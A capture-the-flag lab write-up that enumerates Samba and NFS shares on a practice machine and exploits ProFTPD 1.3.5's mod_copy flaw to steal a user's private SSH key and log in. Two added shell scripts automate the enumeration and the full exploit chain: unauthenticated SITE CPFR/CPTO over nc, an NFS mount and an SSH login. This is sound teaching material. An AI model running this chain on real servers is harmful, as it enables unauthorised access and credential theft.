Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd
1. Enumerate Samba for shares
Points to know:
What is the Server Message Block protocol?
The Server Message Block protocol (SMB) is a client-server protocol for sharing access to files, printers, serial ports and other resources over a network. It originated in the Windows world, so Unix-like systems needed their own implementation of it: that is what Samba is.
Samba is a free implementation of SMB that lets Linux and Unix machines share files and printers with other computers, Windows included.
Let's scan the IP address of the machine with Nmap (a network scanning tool).
The second task is to enumerate the machine for SMB shares, which we can do with Nmap's SMB scripts.
Open SMB shares matter because anyone can read the files they contain and, where the share is writable, anyone can also upload files to the host, which is often the first step towards code execution.
We found three SMB shares.
We are going to inspect the anonymous share: its path is interesting because it exposes a user called kenobi.
To inspect a share we can use smbclient.
smbclient talks to the server and lets us list, download and upload files, much like a command-line FTP client.
dir: list the files on the share
get: download a file from the share (it lands in your current local directory)
Then cat log.txt to read the file. It records the generation of an RSA key pair for the user kenobi and the path where the keys were saved, which is quite informative.
Remember rpcbind? Have a look at the first screenshot.
Remote Procedure Call (RPC) is a protocol that lets one program request a service from a program running on another computer on the network.
The rpcbind service maps RPC program numbers to the ports their services listen on, and redirects a client to the right port so it can talk to the service it asked for.
In our case rpcbind is on port 111, so let's query it with Nmap's NFS scripts to see which directories the host exports over NFS (Network File System).
As we can see, the exported directory is /var.
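The enumeration steps above collected into one script. This is an added example written for this page, not the room's or the original author's material: the Nmap scripts and smbclient flags are real, the target address is a placeholder, and `sample_smb_output` is a constructed stand-in for what `smb-enum-shares` prints so that `open_shares`, which filters the output down to the shares anonymous users can actually reach, can be exercised offline.

```shell
#!/bin/sh
# Added example for this page (not TryHackMe's or the room author's code).
# Enumerate a host's SMB and NFS exposure, then pull a file from an open share.
# The address 10.10.10.10 and the sample output below are assumed placeholders.

# Service/version scan, as in the first Nmap run of the write-up.
scan_host() {
    nmap -sV "$1"
}

# SMB share and user enumeration over port 445 with the Nmap NSE scripts.
enum_smb() {
    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse "$1"
}

# Ask rpcbind (port 111) which directories the host exports over NFS.
enum_nfs() {
    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount "$1"
}

# Read smb-enum-shares output on stdin and print only the shares that
# anonymous users can reach, as "<share>\t<path>\t<anonymous access>".
open_shares() {
    awk '
        # Share header lines look like: "|   \\10.10.10.10\anonymous:"
        /^[|]   \\\\/ {
            share = $0; sub(/^.*\\/, "", share); sub(/:[ \t]*$/, "", share)
            path = ""; next
        }
        /^[|][ \t]+Path:/ { path = $0; sub(/^[|][ \t]+Path:[ \t]*/, "", path) }
        /^[|][ \t]+Anonymous access:/ {
            access = $0; sub(/^[|][ \t]+Anonymous access:[ \t]*/, "", access)
            if (access != "<none>") printf "%s\t%s\t%s\n", share, path, access
        }
    '
}

# List a share and fetch one file with no password (-N), non-interactively (-c).
fetch_from_share() {   # fetch_from_share <host> <share> <file>
    smbclient "//$1/$2" -N -c "dir; get $3"
}

# Constructed sample of smb-enum-shares output (placeholder address and paths).
sample_smb_output() {
    cat <<'EOF'
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.10\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.10\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.10\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|     Current user access: <none>
EOF
}

# With a target: run the real scans. Without one: show the parser on the sample.
if [ "$#" -ge 1 ]; then
    scan_host "$1"
    enum_smb "$1" | open_shares
    enum_nfs "$1"
else
    sample_smb_output | open_shares
fi
```

Run it as `sh enum.sh <target>` to scan a live host, or with no argument to see the filter pick `IPC$` and `anonymous` out of the sample and drop `print$`, whose anonymous access is `<none>`. The filter keys on the `Anonymous access` field rather than `Current user access`, because the latter reflects whatever account Nmap happened to authenticate with.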
2. Manipulate a vulnerable version of proftpd
From the first Nmap scan we also know that the ProFTPD version is 1.3.5. Its mod_copy module (CVE-2015-3306) lets an unauthenticated client copy files on the server with the SITE CPFR and SITE CPTO commands, subject only to the FTP daemon's own file permissions. We exploit this to copy kenobi's private RSA key into /var/tmp, which sits inside the /var export we can mount over NFS.
Use the commands below to perform this task.
nc: open a raw TCP connection to the given IP and port (here the FTP control port).
SITE CPFR <path>: select the file to copy from the given path.
SITE CPTO <path>: write the copy to the given path.
Let's mount the /var export on our machine.
mkdir: create the mount point /mnt/kenobi.
mount: attach the remote export to /mnt/kenobi. This mounts the remote /var rather than downloading it, so the key we just copied on the server side is visible straight away.
/mnt/kenobi/tmp now contains the copied id_rsa, which we can use to log in as kenobi.
Copy id_rsa to a local directory, set its permissions to 600 (ssh refuses to use a private key that other users can read), then log in as kenobi with ssh -i and that key.
SSH (Secure Shell) is an encrypted network protocol for logging in to, and running commands on, a remote machine.
Once logged in, we can see the user.txt file, which contains the flag.
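The whole exploitation chain (mod_copy exchange, NFS mount, key permissions, SSH login) as one script. This is an added example for this page, not the room's or the original author's code. The host, paths and both FTP transcripts are assumed or constructed placeholders; the reply lines in the transcripts are the ones ProFTPD's mod_copy sends for an accepted CPFR (350), a successful CPTO (250) and a rejected source path (550), and `copy_succeeded` is the check that tells the two outcomes apart:

```shell
#!/bin/sh
# Added example for this page (not TryHackMe's or the room author's code).
# Abuse ProFTPD 1.3.5 mod_copy (SITE CPFR/CPTO) to copy kenobi's private key
# into the NFS-exported /var, mount the export, and log in with the key.
# Host 10.10.10.10, file paths and the sample transcripts are placeholders.

# Raw FTP control-channel commands pushed to port 21. No login is sent:
# mod_copy in this version honours SITE CPFR/CPTO before authentication.
mod_copy_commands() {   # mod_copy_commands <src> <dst>
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Read the server's replies on stdin; succeed only if CPFR was accepted (350)
# and CPTO then answered "250 Copy successful".
copy_succeeded() {
    awk '/^350 / { ready = 1 }
         /^250 Copy successful/ { if (ready) ok = 1 }
         END { exit !ok }'
}

# Drive the exchange with nc and report whether the copy happened.
mod_copy_exploit() {   # mod_copy_exploit <host> <src> <dst>
    mod_copy_commands "$2" "$3" | nc -w 5 "$1" 21 | copy_succeeded
}

# Mount the NFS export (/var) on a local mount point. This attaches the remote
# tree; nothing is downloaded.
mount_export() {   # mount_export <host> <mountpoint>
    mkdir -p "$2" && mount "$1:/var" "$2"
}

# Copy the key somewhere local and lock it to 0600: ssh refuses a private key
# that other users can read. Fails unless the resulting mode is exactly 0600.
prepare_key() {   # prepare_key <src> <dst>
    cp "$1" "$2" && chmod 600 "$2" && find "$2" -perm 600 | grep -q .
}

# Log in as kenobi with the copied key.
ssh_as_kenobi() {   # ssh_as_kenobi <host> <key>
    ssh -i "$2" "kenobi@$1"
}

# Constructed transcripts of the control channel as the client sees it.
sample_transcript_ok() {
    printf '%s\r\n' \
        '220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.10]' \
        '350 File or directory exists, ready for destination name' \
        '250 Copy successful' \
        '221 Goodbye.'
}
sample_transcript_denied() {
    printf '%s\r\n' \
        '220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.10]' \
        '550 /home/kenobi/.ssh/id_rsa: No such file or directory'
}

# Full chain when a host is given: copy the key into /var/tmp on the server,
# mount /var locally, fix the key's permissions, and open the shell.
if [ "$#" -ge 1 ]; then
    host=$1
    mod_copy_exploit "$host" /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa || exit 1
    mount_export "$host" /mnt/kenobi || exit 1
    prepare_key /mnt/kenobi/tmp/id_rsa ./id_rsa || exit 1
    ssh_as_kenobi "$host" ./id_rsa
fi
```

`mount` needs root on the attacking machine, so run the script with `sudo sh chain.sh <target>`. Checking for the `250 Copy successful` reply rather than just a connection is what makes the step reliable: a `550` from CPFR means the source path is wrong or unreadable by the daemon, and continuing to the mount would only waste time.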